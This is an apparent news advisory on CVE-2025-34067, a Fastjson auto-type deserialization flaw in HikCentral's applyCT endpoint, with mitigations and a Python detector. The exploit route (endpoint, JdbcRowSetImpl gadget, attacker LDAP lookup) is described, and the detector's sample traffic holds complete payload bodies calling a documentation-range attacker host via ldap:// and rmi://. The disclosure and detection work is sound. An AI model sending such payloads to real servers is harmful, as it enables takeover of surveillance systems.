Critical HIKVISION applyCT Vulnerability (CVE-2025-34067) Allows Remote Code Execution
7th July 2025, Kathmandu
A critical security flaw (CVE-2025-34067) has been disclosed in the applyCT component of HIKVISION's HikCentral platform, posing a serious risk to surveillance infrastructures worldwide.
The flaw allows unauthenticated remote code execution (RCE) and can be exploited against any reachable vulnerable deployment, which in practice means security systems across government, commercial and industrial sectors.
What is HIKVISION applyCT (HikCentral)?
applyCT is a component of HikCentral, HIKVISION's security management platform. With advanced analytics, centralized monitoring and a scalable architecture, HikCentral is widely deployed to manage surveillance systems, video feeds and security devices.
That reach cuts both ways: a single flaw in the platform exposes every site that runs it.
CVE-2025-34067: Key Technical Details
Component Affected: applyCT (HikCentral)
Vulnerability Type: Unauthenticated Remote Code Execution (RCE)
Attack Vector: Network-based, no authentication required
Root Cause: Unsafe deserialization of untrusted JSON with the Fastjson library (auto-type enabled)
Vulnerable Endpoint: /bic/ssoService/v1/applyCT
Exploit Mechanism: Abuses Fastjson's auto-type (@type) deserialization feature
An attacker can POST a crafted JSON document to this endpoint. Because Fastjson honours the @type key when auto-type support is enabled, the payload can name the com.sun.rowset.JdbcRowSetImpl class and point its data-source property at an attacker-controlled LDAP server. The resulting JNDI lookup fetches an attacker-supplied Java object and executes it, giving full remote code execution on the HikCentral server.
Proof-of-Concept (PoC) Explained
In a typical exploit:
The attacker sends a crafted POST request to /bic/ssoService/v1/applyCT with a JSON payload whose @type key names com.sun.rowset.JdbcRowSetImpl.
The dataSourceName property of that object is set to a URL on an attacker-controlled LDAP server.
When Fastjson instantiates the class and calls its setters, the HikCentral server performs a JNDI lookup against that URL, loads the returned object and executes the attacker's code.
The attacker now has unauthenticated code execution on, and control over, the system.
Whether the final remote class load succeeds depends on the target JVM (recent JDKs refuse remote codebases by default), but the unauthenticated deserialization sink is the defect and must be patched regardless.
Severity Level: CRITICAL
CVSS 4.0 Score: 10.0 (Maximum)
Risk Level: Extremely High
Authentication Required: No
Potential Impact of Exploitation
Organizations using vulnerable versions of applyCT are exposed to severe risks:
Full system compromise
Unauthorized access to surveillance footage and sensitive data
Disruption or manipulation of security systems and video feeds
Lateral movement within internal networks
Financial losses, reputational damage, and legal consequences
Recommended Mitigation Steps
To defend against CVE-2025-34067, organizations must take immediate action:
1. Upgrade Immediately
Apply HIKVISION's fix for CVE-2025-34067 in HikCentral; the patched build must no longer pass untrusted JSON through a Fastjson configuration with auto-type enabled.
2. Restrict Endpoint Access
Block access to /bic/ssoService/v1/applyCT from untrusted networks and from the internet. The management platform should only be reachable from trusted management networks or over a VPN, and never be directly exposed.
3. Monitor LDAP Traffic
Alert on outbound LDAP (389/636) and RMI connections initiated by the HikCentral server to any host other than your own directory servers; the platform has no other reason to make such connections, so they are a strong sign of exploitation. Where possible, egress-filter them as well, since that also cuts off the JNDI callback an exploit depends on.
4. Apply Vendor Security Updates
Subscribe to HIKVISION security advisories and apply subsequent updates promptly, rather than treating this patch as a one-off.
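The following Python script is added here as an illustration of what step 3 can look like in practice, tied back to the payload structure described in the PoC section; it is not HIKVISION's code and not the published proof of concept. It walks parsed JSON request bodies looking for Fastjson @type keys, the JdbcRowSetImpl gadget class named in the advisory, and ldap:// or rmi:// URLs, then rates each request by whether it targets /bic/ssoService/v1/applyCT. The request records, the gadget set (which you would extend), the 203.0.113.0/24 addresses and the severity scheme are assumptions made for the example.

```python
"""Detect Fastjson auto-type gadget payloads aimed at the HikCentral applyCT endpoint.

Added example for this article, not Hikvision code and not the public PoC.
It inspects request records that a reverse proxy or WAF could hand it.
Sample requests below are constructed (203.0.113.0/24 is a documentation range).
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass, field
from typing import Any, Iterator

VULNERABLE_PATH = "/bic/ssoService/v1/applyCT"

# Gadget class named in the advisory; extend with other JNDI-capable classes.
# Any @type key is flagged too, so unknown gadgets still surface as "autotype".
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}

# JNDI reference URLs a gadget can be pointed at: LDAP (from the article) and RMI.
JNDI_URL = re.compile(r'\b(?:ldaps?|rmi)://[^\s"\']+', re.IGNORECASE)


@dataclass
class Finding:
    request_id: str
    severity: str  # "critical", "high" or "medium" (scheme assumed for the example)
    reasons: list[str] = field(default_factory=list)


def walk(node: Any, path: str = "$") -> Iterator[tuple[str, Any, Any]]:
    """Yield (json_path, key, value) for every entry in a parsed JSON document.

    Lists are descended too, so a gadget hidden inside an array is still found.
    """
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            yield child, key, value
            yield from walk(value, child)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            child = f"{path}[{index}]"
            yield child, index, value
            yield from walk(value, child)


def analyze_body(body: str) -> list[str]:
    """Return the reasons a body looks like a Fastjson auto-type attack.

    json.loads() decodes escapes such as "\\u0040type", which Fastjson accepts too,
    so an obfuscated "@type" key is normalised before the check. A body that is not
    valid JSON is still scanned as raw text for JNDI URLs instead of being ignored.
    """
    reasons: list[str] = []
    try:
        doc = json.loads(body)
    except ValueError:
        reasons.extend(f"jndi_url_in_unparsable_body:{u}" for u in JNDI_URL.findall(body))
        return reasons
    for path, key, value in walk(doc):
        if key == "@type":
            if isinstance(value, str) and value in GADGET_CLASSES:
                reasons.append(f"gadget_class:{value}@{path}")
            else:
                reasons.append(f"autotype_key@{path}")
        if isinstance(value, str):
            reasons.extend(f"jndi_url:{u}@{path}" for u in JNDI_URL.findall(value))
    return reasons


def analyze_request(request: dict[str, str]) -> Finding | None:
    """Classify one record {id, method, path, body}; None when it is clean."""
    reasons = analyze_body(request.get("body", ""))
    if not reasons:
        return None
    on_target = request.get("path", "").split("?", 1)[0] == VULNERABLE_PATH
    strong = any(r.startswith(("gadget_class:", "jndi_url:")) for r in reasons)
    severity = "critical" if on_target and strong else "high" if (strong or on_target) else "medium"
    if on_target:
        reasons.append("targets_vulnerable_endpoint")
    return Finding(request["id"], severity, reasons)


def scan(requests: list[dict[str, str]]) -> list[Finding]:
    """Run the detector over a batch of request records, keeping only hits."""
    return [f for f in map(analyze_request, requests) if f is not None]


# Constructed sample traffic; none of it was captured from a real system.
SAMPLE_REQUESTS = [
    {"id": "r1", "method": "POST", "path": VULNERABLE_PATH,  # gadget + LDAP data source
     "body": '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://203.0.113.10:1389/a"}'},
    {"id": "r2", "method": "POST", "path": VULNERABLE_PATH + "?lang=en",  # escaped key, nested in a list
     "body": '{"params":[{"\\u0040type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://203.0.113.10:1099/b"}]}'},
    {"id": "r3", "method": "POST", "path": VULNERABLE_PATH,  # ordinary request: clean
     "body": '{"ticket":"abc123","redirect":"https://portal.example.com/home"}'},
    {"id": "r4", "method": "POST", "path": "/bic/other",  # unknown @type elsewhere: worth a look
     "body": '{"@type":"java.util.HashMap","k":"v"}'},
    {"id": "r5", "method": "POST", "path": VULNERABLE_PATH,  # not JSON, but carries a JNDI URL
     "body": "x=ldap://203.0.113.10:1389/c"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding.request_id, finding.severity, ", ".join(finding.reasons))
```

Feed it whatever your reverse proxy or WAF records as request bodies. The design point is that the body is parsed before the check: json.loads() turns an escaped key such as \u0040type back into @type, exactly as Fastjson would, so a detector that only grepped the raw body for the literal string "@type" would miss that request.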
Final Thoughts
This vulnerability in HIKVISION's HikCentral is a wake-up call for organizations that rely on centralized surveillance platforms: unauthenticated remote code execution on the system that controls every camera and recorder is about as serious as a flaw gets.
Immediate patching and restricting access to the endpoint are the priorities. Organizations should also audit existing deployments for exposure, especially any reachable from the internet, and update their security procedures accordingly.
Stay updated on cybersecurity threats and mitigation tips at ICT Frame Magazine, your trusted source for IT news and analysis in Nepal and beyond.